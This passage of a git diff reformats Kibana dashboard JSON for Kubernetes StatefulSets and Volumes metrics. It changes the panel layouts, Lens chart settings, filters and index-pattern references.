"isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } - }, - "title": "Replicas per StatefulSet [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "33ac762e-904d-4a44-a943-e76d147b5770", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "f482071f-d956-4817-90b5-82a74d8aa841", - "w": 48, - "x": 0, - "y": 11 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "0c8870bf-3e60-4949-9715-6b7a762034b4", + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" + ], + "layerId": "0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "c7aa47ec-c87d-47ac-a318-a00b90b32b5d" + } + ], + "legend": { + "isVisible": true, + "position": "right" }, - "panelIndex": "f482071f-d956-4817-90b5-82a74d8aa841", - "title": "Replicas per StatefulSet [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] StatefulSets", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:40:45.524Z", - "id": "kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": 
"d8265dae-829d-434f-a826-cc6062edfd3a:indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d8265dae-829d-434f-a826-cc6062edfd3a:988215de-1bb2-4dd7-91a4-a07d3d436b89", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:3fbf4162-1133-4eee-ad35-334b047efd3d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dd7df777-8dae-4374-96ee-461be82fbde4:indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dd7df777-8dae-4374-96ee-461be82fbde4:778d517a-5fab-4174-8f76-966de3e4452a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:84dd109c-0824-4ccf-948b-8bad46f6203a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f482071f-d956-4817-90b5-82a74d8aa841:indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f482071f-d956-4817-90b5-82a74d8aa841:33ac762e-904d-4a44-a943-e76d147b5770", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_5f6614ff-57c0-400e-8350-47e86ad5c77f:optionsListDataView", - "type": "index-pattern" + 
"preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "Replicas per StatefulSet [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_6faac538-d3fd-4f77-85cc-3b7171c7144c:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 14, + "i": "f482071f-d956-4817-90b5-82a74d8aa841", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_82c41492-acf8-4b51-bba9-ec54c99fb1ba:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "f482071f-d956-4817-90b5-82a74d8aa841", + "title": "Replicas per StatefulSet [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] StatefulSets", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d8265dae-829d-434f-a826-cc6062edfd3a:indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d8265dae-829d-434f-a826-cc6062edfd3a:988215de-1bb2-4dd7-91a4-a07d3d436b89", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:3fbf4162-1133-4eee-ad35-334b047efd3d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd7df777-8dae-4374-96ee-461be82fbde4:indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd7df777-8dae-4374-96ee-461be82fbde4:778d517a-5fab-4174-8f76-966de3e4452a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"3e6790d6-de88-47de-8c3e-d8aa2c89c538:indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:84dd109c-0824-4ccf-948b-8bad46f6203a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f482071f-d956-4817-90b5-82a74d8aa841:indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f482071f-d956-4817-90b5-82a74d8aa841:33ac762e-904d-4a44-a943-e76d147b5770", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_5f6614ff-57c0-400e-8350-47e86ad5c77f:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_6faac538-d3fd-4f77-85cc-3b7171c7144c:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_82c41492-acf8-4b51-bba9-ec54c99fb1ba:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json index 1f74effa077..d578f97bfdc 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json 
@@ -1,490 +1,500 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"c9e17236-d41d-4748-8eb7-54c93d5a1478\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"c9e17236-d41d-4748-8eb7-54c93d5a1478\",\"enhancements\":{}}},\"049e831a-2716-4c4b-a037-b2b45789842a\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"049e831a-2716-4c4b-a037-b2b45789842a\",\"selectedOptions\":[],\"enhancements\":{}}},\"60ec5f9c-087d-48e6-98ab-488952a7b186\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.volume.name\",\"title\":\"Volume Name\",\"id\":\"60ec5f9c-087d-48e6-98ab-488952a7b186\",\"enhancements\":{}}}}" + "id": "kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"c9e17236-d41d-4748-8eb7-54c93d5a1478\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"c9e17236-d41d-4748-8eb7-54c93d5a1478\",\"enhancements\":{}}},\"049e831a-2716-4c4b-a037-b2b45789842a\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"049e831a-2716-4c4b-a037-b2b45789842a\",\"selectedOptions\":[],\"enhancements\":{}}},\"60ec5f9c-087d-48e6-98ab-488952a7b186\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.volume.name\",\"title\":\"Volume Name\",\"id\":\"60ec5f9c-087d-48e6-98ab-488952a7b186\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Volumes", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "8353083b-3ad8-4814-b22f-bc7314e751d1", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Volumes", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "8353083b-3ad8-4814-b22f-bc7314e751d1", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "0f641488-aa6d-4409-9789-5967590635d5", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "panelIndex": "0f641488-aa6d-4409-9789-5967590635d5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { + "columnOrder": [ + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "227c4795-30a7-48dc-990a-11fe7b4bca3c", + "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", + "a52b3682-8595-4cff-89b2-590cd5c3e6c2" + ], + "columns": { + "227c4795-30a7-48dc-990a-11fe7b4bca3c": { + "customLabel": true, + "dataType": "number", 
+ "isBucketed": false, + "label": "Fs Capacity bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.capacity.bytes" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "8353083b-3ad8-4814-b22f-bc7314e751d1", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "8353083b-3ad8-4814-b22f-bc7314e751d1", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - 
"datasourceStates": { - "formBased": { - "layers": { - "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { - "columnOrder": [ - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "227c4795-30a7-48dc-990a-11fe7b4bca3c", - "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", - "a52b3682-8595-4cff-89b2-590cd5c3e6c2" - ], - "columns": { - "227c4795-30a7-48dc-990a-11fe7b4bca3c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Capacity bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.capacity.bytes" - }, - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Volume", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.volume.name" - }, - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Available bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.available.bytes" - }, - "a52b3682-8595-4cff-89b2-590cd5c3e6c2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.volume.fs.used.pct: *" - }, - "isBucketed": false, - "label": "Fs Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.used.pct" - }, - "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540": { 
- "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Used bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.used.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Volume", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.volume" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.volume" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "isTransposed": false - }, - { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "isTransposed": false - }, - { - "columnId": "227c4795-30a7-48dc-990a-11fe7b4bca3c", - "isTransposed": false - }, - { - "columnId": "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", - "isTransposed": false - }, - { - "columnId": "a52b3682-8595-4cff-89b2-590cd5c3e6c2", - "isTransposed": false - } - ], - "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.volume.name" + }, + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Fs Available 
bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.available.bytes" + }, + "a52b3682-8595-4cff-89b2-590cd5c3e6c2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.volume.fs.used.pct: *" + }, + "isBucketed": false, + "label": "Fs Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 3 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.used.pct" }, - "title": "Filesystem Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Fs Used bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.used.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.volume" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "0f641488-aa6d-4409-9789-5967590635d5", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "0f641488-aa6d-4409-9789-5967590635d5", - "title": "Filesystem Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.volume" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": 
"3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "isTransposed": false + }, + { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "isTransposed": false + }, + { + "columnId": "227c4795-30a7-48dc-990a-11fe7b4bca3c", + "isTransposed": false + }, + { + "columnId": "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", + "isTransposed": false + }, + { + "columnId": "a52b3682-8595-4cff-89b2-590cd5c3e6c2", + "isTransposed": false + } + ], + "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" + "title": "Filesystem Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Filesystem Informations [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "eec01fb6-ac46-4573-b231-4394ac7090c0", + "w": 48, + "x": 0, + "y": 21 + }, + "panelIndex": "eec01fb6-ac46-4573-b231-4394ac7090c0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { + "columnOrder": [ + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "1e1cd98f-fe72-473f-86ab-e79a621f8527", + "b5cfcf26-889f-4514-a8b6-57f68267cfd2" + ], + "columns": { + "1e1cd98f-fe72-473f-86ab-e79a621f8527": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Free Inodes", 
+ "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.free" + }, + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Volume", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { - "columnOrder": [ - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "1e1cd98f-fe72-473f-86ab-e79a621f8527", - "b5cfcf26-889f-4514-a8b6-57f68267cfd2" - ], - "columns": { - "1e1cd98f-fe72-473f-86ab-e79a621f8527": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Free Inodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.free" - }, - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Volume", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.volume.name" - }, - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Inodes", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - 
"scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.count" - }, - "b5cfcf26-889f-4514-a8b6-57f68267cfd2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Used Inodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.used" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.volume" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.volume" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.volume.name" + }, + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Inodes", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "columns": [ - { - "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "isTransposed": false - }, - { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "isTransposed": false - }, - { - "columnId": "1e1cd98f-fe72-473f-86ab-e79a621f8527", - "isTransposed": false - }, - { - "columnId": "b5cfcf26-889f-4514-a8b6-57f68267cfd2", - "isTransposed": false - } - ], - "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.count" }, - "title": 
